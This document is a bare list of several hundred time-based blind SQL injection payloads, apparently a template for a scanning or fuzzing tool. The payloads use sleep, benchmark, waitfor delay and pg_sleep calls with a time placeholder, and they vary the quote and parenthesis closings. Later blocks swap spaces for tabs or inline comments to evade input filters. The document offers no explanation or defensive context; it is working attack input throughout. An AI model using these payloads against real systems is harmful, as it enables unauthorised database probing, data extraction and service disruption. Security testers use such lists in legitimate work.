sleep(__TIME__)#
1 or sleep(__TIME__)#
" or sleep(__TIME__)#
' or sleep(__TIME__)#
" or sleep(__TIME__)="
' or sleep(__TIME__)='
1) or sleep(__TIME__)#
") or sleep(__TIME__)="
') or sleep(__TIME__)='
1)) or sleep(__TIME__)#
")) or sleep(__TIME__)="
')) or sleep(__TIME__)='
1 and sleep(__TIME__)#
" and sleep(__TIME__)#
' and sleep(__TIME__)#
" and sleep(__TIME__)="
' and sleep(__TIME__)='
1) and sleep(__TIME__)#
") and sleep(__TIME__)="
') and sleep(__TIME__)='
1)) and sleep(__TIME__)#
")) and sleep(__TIME__)="
')) and sleep(__TIME__)='
;waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:__TIME__'--
';waitfor delay '0:0:__TIME__'--
";waitfor delay '0:0:__TIME__'--
');waitfor delay '0:0:__TIME__'--
");waitfor delay '0:0:__TIME__'--
));waitfor delay '0:0:__TIME__'--
'));waitfor delay '0:0:__TIME__'--
"));waitfor delay '0:0:__TIME__'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(__TIME__)--
1 or pg_sleep(__TIME__)--
" or pg_sleep(__TIME__)--
' or pg_sleep(__TIME__)--
1) or pg_sleep(__TIME__)--
") or pg_sleep(__TIME__)--
') or pg_sleep(__TIME__)--
1)) or pg_sleep(__TIME__)--
")) or pg_sleep(__TIME__)--
')) or pg_sleep(__TIME__)--
1 and pg_sleep(__TIME__)--
" and pg_sleep(__TIME__)--
' and pg_sleep(__TIME__)--
1) and pg_sleep(__TIME__)--
") and pg_sleep(__TIME__)--
') and pg_sleep(__TIME__)--
1)) and pg_sleep(__TIME__)--
")) and pg_sleep(__TIME__)--
')) and pg_sleep(__TIME__)--
1[TAB]or[TAB]sleep(__TIME__)#
"[TAB]or[TAB]sleep(__TIME__)#
'[TAB]or[TAB]sleep(__TIME__)#
"[TAB]or[TAB]sleep(__TIME__)="
'[TAB]or[TAB]sleep(__TIME__)='
1)[TAB]or[TAB]sleep(__TIME__)#
")[TAB]or[TAB]sleep(__TIME__)="
')[TAB]or[TAB]sleep(__TIME__)='
1))[TAB]or[TAB]sleep(__TIME__)#
"))[TAB]or[TAB]sleep(__TIME__)="
'))[TAB]or[TAB]sleep(__TIME__)='
1[TAB]and[TAB]sleep(__TIME__)#
"[TAB]and[TAB]sleep(__TIME__)#
'[TAB]and[TAB]sleep(__TIME__)#
"[TAB]and[TAB]sleep(__TIME__)="
'[TAB]and[TAB]sleep(__TIME__)='
1)[TAB]and[TAB]sleep(__TIME__)#
")[TAB]and[TAB]sleep(__TIME__)="
')[TAB]and[TAB]sleep(__TIME__)='
1))[TAB]and[TAB]sleep(__TIME__)#
"))[TAB]and[TAB]sleep(__TIME__)="
'))[TAB]and[TAB]sleep(__TIME__)='
;waitfor[TAB]delay[TAB]'0:0:__TIME__'--
);waitfor[TAB]delay[TAB]'0:0:__TIME__'--
';waitfor[TAB]delay[TAB]'0:0:__TIME__'--
";waitfor[TAB]delay[TAB]'0:0:__TIME__'--
');waitfor[TAB]delay[TAB]'0:0:__TIME__'--
");waitfor[TAB]delay[TAB]'0:0:__TIME__'--
));waitfor[TAB]delay[TAB]'0:0:__TIME__'--
'));waitfor[TAB]delay[TAB]'0:0:__TIME__'--
"));waitfor[TAB]delay[TAB]'0:0:__TIME__'--
1[TAB]or[TAB]benchmark(10000000,MD5(1))#
"[TAB]or[TAB]benchmark(10000000,MD5(1))#
'[TAB]or[TAB]benchmark(10000000,MD5(1))#
1)[TAB]or[TAB]benchmark(10000000,MD5(1))#
")[TAB]or[TAB]benchmark(10000000,MD5(1))#
')[TAB]or[TAB]benchmark(10000000,MD5(1))#
1))[TAB]or[TAB]benchmark(10000000,MD5(1))#
"))[TAB]or[TAB]benchmark(10000000,MD5(1))#
'))[TAB]or[TAB]benchmark(10000000,MD5(1))#
1[TAB]or[TAB]pg_sleep(__TIME__)--
"[TAB]or[TAB]pg_sleep(__TIME__)--
'[TAB]or[TAB]pg_sleep(__TIME__)--
1)[TAB]or[TAB]pg_sleep(__TIME__)--
")[TAB]or[TAB]pg_sleep(__TIME__)--
')[TAB]or[TAB]pg_sleep(__TIME__)--
1))[TAB]or[TAB]pg_sleep(__TIME__)--
"))[TAB]or[TAB]pg_sleep(__TIME__)--
'))[TAB]or[TAB]pg_sleep(__TIME__)--
1[TAB]and[TAB]pg_sleep(__TIME__)--
"[TAB]and[TAB]pg_sleep(__TIME__)--
'[TAB]and[TAB]pg_sleep(__TIME__)--
1)[TAB]and[TAB]pg_sleep(__TIME__)--
")[TAB]and[TAB]pg_sleep(__TIME__)--
')[TAB]and[TAB]pg_sleep(__TIME__)--
1))[TAB]and[TAB]pg_sleep(__TIME__)--
"))[TAB]and[TAB]pg_sleep(__TIME__)--
'))[TAB]and[TAB]pg_sleep(__TIME__)--
1/**/or/**/sleep(__TIME__)#
"/**/or/**/sleep(__TIME__)#
'/**/or/**/sleep(__TIME__)#
"/**/or/**/sleep(__TIME__)="
'/**/or/**/sleep(__TIME__)='
1)/**/or/**/sleep(__TIME__)#
")/**/or/**/sleep(__TIME__)="
')/**/or/**/sleep(__TIME__)='
1))/**/or/**/sleep(__TIME__)#
"))/**/or/**/sleep(__TIME__)="
'))/**/or/**/sleep(__TIME__)='
1/**/and/**/sleep(__TIME__)#
"/**/and/**/sleep(__TIME__)#
'/**/and/**/sleep(__TIME__)#
"/**/and/**/sleep(__TIME__)="
'/**/and/**/sleep(__TIME__)='
1)/**/and/**/sleep(__TIME__)#
")/**/and/**/sleep(__TIME__)="
')/**/and/**/sleep(__TIME__)='
1))/**/and/**/sleep(__TIME__)#
"))/**/and/**/sleep(__TIME__)="
'))/**/and/**/sleep(__TIME__)='
;waitfor/**/delay/**/'0:0:__TIME__'--
);waitfor/**/delay/**/'0:0:__TIME__'--
';waitfor/**/delay/**/'0:0:__TIME__'--
";waitfor/**/delay/**/'0:0:__TIME__'--
');waitfor/**/delay/**/'0:0:__TIME__'--
");waitfor/**/delay/**/'0:0:__TIME__'--
));waitfor/**/delay/**/'0:0:__TIME__'--
'));waitfor/**/delay/**/'0:0:__TIME__'--
"));waitfor/**/delay/**/'0:0:__TIME__'--
1/**/or/**/benchmark(10000000,MD5(1))#
"/**/or/**/benchmark(10000000,MD5(1))#
'/**/or/**/benchmark(10000000,MD5(1))#
1)/**/or/**/benchmark(10000000,MD5(1))#
")/**/or/**/benchmark(10000000,MD5(1))#
')/**/or/**/benchmark(10000000,MD5(1))#
1))/**/or/**/benchmark(10000000,MD5(1))#
"))/**/or/**/benchmark(10000000,MD5(1))#
'))/**/or/**/benchmark(10000000,MD5(1))#
1/**/or/**/pg_sleep(__TIME__)--
"/**/or/**/pg_sleep(__TIME__)--
'/**/or/**/pg_sleep(__TIME__)--
1)/**/or/**/pg_sleep(__TIME__)--
")/**/or/**/pg_sleep(__TIME__)--
')/**/or/**/pg_sleep(__TIME__)--
1))/**/or/**/pg_sleep(__TIME__)--
"))/**/or/**/pg_sleep(__TIME__)--
'))/**/or/**/pg_sleep(__TIME__)--
1/**/and/**/pg_sleep(__TIME__)--
"/**/and/**/pg_sleep(__TIME__)--
'/**/and/**/pg_sleep(__TIME__)--
1)/**/and/**/pg_sleep(__TIME__)--
")/**/and/**/pg_sleep(__TIME__)--
')/**/and/**/pg_sleep(__TIME__)--
1))/**/and/**/pg_sleep(__TIME__)--
"))/**/and/**/pg_sleep(__TIME__)--
'))/**/and/**/pg_sleep(__TIME__)--
